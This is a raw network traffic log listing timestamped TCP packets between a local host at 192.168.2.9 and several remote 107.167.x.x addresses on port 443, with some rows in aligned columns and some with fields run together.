Dec 9, 2024 17:40:00.873903036 CET  443    49713  107.167.96.30  192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.873919010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.873986959 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.873996019 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.875925064 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.949770927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.949805021 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.949903965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:00.949934006 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:00.950316906 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.032340050 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032363892 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032421112 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.032440901 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.032485008 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.033890009 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.038165092 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.038181067 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.038319111 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.038331032 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.040004015 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.043041945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.043057919 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.043126106 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.043134928 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.044157028 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.048787117 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.048800945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.048974991 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.048989058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.052098036 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.054784060 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054799080 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054857969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.054866076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054898024 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.054919004 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.059679031 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.059695005 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.059802055 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.059813023 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.060003996 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.065439939 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.065464973 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.065546036 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.065557003 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.068492889 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.141535997 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141567945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141829967 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.141846895 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141894102 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.224359989 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.224387884 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.224500895 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.224522114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.228050947 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.229928970 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.229963064 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.230015039 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.230022907 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.230047941 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.230083942 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234828949 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234865904 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234941959 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234951019 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234968901 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234994888 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240181923 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240211010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240259886 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240267992 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240305901 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240322113 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.245718956 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.245742083 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.245834112 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.245842934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.248014927 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251101971 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251126051 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251213074 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251220942 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251238108 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251271963 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256287098 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256309986 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256403923 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256413937 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256429911 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256458044 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.333573103 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.333604097 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.333714962 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.333730936 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.334027052 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.417494059 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417526007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417670965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.417690039 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417984962 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.421869040 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.421891928 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.421953917 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.421969891 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426002979 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426740885 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426769972 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426824093 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426840067 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426851034 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426959038 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.432524920 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432554960 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432626009 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.432643890 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432674885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.433989048 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437668085 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437696934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437762022 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437784910 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437824965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437824965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442725897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442749977 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442802906 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442821026 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442857027 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442857027 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448281050 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.448306084 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.448379040 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448379040 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448398113 CET44349713107.167.96.30192.168.2.9
Timestamp                           Src Port  Dst Port  Source IP        Dest IP
Dec 9, 2024 17:40:01.448432922 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.525665998 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.525696039 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.525770903 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.525793076 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.526001930 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.608886003 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.608911037 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.608994961 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.609009981 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.609021902 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.609065056 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.614289045 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.614315033 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.614388943 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.614398003 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.614413023 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.614444971 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.619143963 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.619170904 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.619223118 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.619230032 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.619275093 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.619275093 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.624589920 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.624604940 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.624663115 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.624674082 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.625514030 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.630075932 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.630099058 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.630153894 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.630163908 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.630172968 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.630234957 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.635380983 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.635410070 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.635452032 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.635472059 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.635483980 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.635623932 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.640774012 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.640800953 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.640862942 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.640872002 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.640889883 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.641987085 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.718184948 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.718211889 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.718278885 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.718298912 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.718341112 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.718373060 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.800957918 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.800983906 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.801052094 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.801083088 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.801192999 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.806165934 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.806190014 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.806245089 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.806262016 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.806322098 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.811062098 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.811089039 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.811134100 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.811145067 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.811173916 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.811193943 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.817333937 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.817357063 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.817403078 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.817425966 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.817467928 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.817467928 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.821893930 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.821913958 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.821975946 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.821993113 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.822163105 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.827517986 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.827534914 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.827608109 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.827641010 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.827845097 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.832550049 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.832566977 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.832628012 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.832643986 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.832721949 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.918215990 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.918243885 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.918405056 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:01.918421984 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:01.918466091 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.002412081 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.002439976 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.002561092 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.002580881 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.002646923 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.007628918 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.007654905 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.007751942 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.007766008 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.007853031 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.013191938 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.013217926 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.013290882 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.013307095 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.013365984 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.018074036 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.018141031 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.018162012 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:02.018198013 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.018342018 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.018663883 CET  49713     443       192.168.2.9      107.167.96.30
Dec 9, 2024 17:40:02.018686056 CET  443       49713     107.167.96.30    192.168.2.9
Dec 9, 2024 17:40:05.211908102 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:05.211945057 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:05.212018967 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:05.213499069 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:05.213543892 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:05.213617086 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:05.236277103 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:05.236299992 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:05.236376047 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:05.236402988 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:05.844213009 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:05.844260931 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:05.849982023 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:05.849982977 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:05.850028992 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:06.703263044 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:06.703356028 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:06.704138041 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:06.704200983 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:07.446796894 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:07.446824074 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:07.446891069 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.446914911 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:07.447235107 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:07.447336912 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.447879076 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:07.447927952 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:07.449652910 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:07.449996948 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.491339922 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:07.495326042 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:07.695400000 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:07.695481062 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:07.701903105 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:07.701915026 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:07.702234983 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:07.702301025 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:07.747855902 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:07.747895956 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:07.747937918 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:07.803215981 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:07.803283930 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.803291082 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:07.803339005 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.805737972 CET  49715     443       192.168.2.9      107.167.96.38
Dec 9, 2024 17:40:07.805766106 CET  443       49715     107.167.96.38    192.168.2.9
Dec 9, 2024 17:40:08.042385101 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:08.042475939 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:08.042562962 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:08.044554949 CET  49714     443       192.168.2.9      107.167.96.39
Dec 9, 2024 17:40:08.044578075 CET  443       49714     107.167.96.39    192.168.2.9
Dec 9, 2024 17:40:08.199711084 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:08.199799061 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:08.199816942 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:08.199882030 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:08.199973106 CET  49716     443       192.168.2.9      107.167.125.189
Dec 9, 2024 17:40:08.199991941 CET  443       49716     107.167.125.189  192.168.2.9
Dec 9, 2024 17:40:08.200012922 CET  49716     443       192.168.2.9      107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.200052977 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.204634905 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.204690933 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.204773903 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.205008030 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.205022097 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.353538990 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.353585958 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.353761911 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.354163885 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.354182005 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.618891954 CET49719443192.168.2.9107.167.96.36
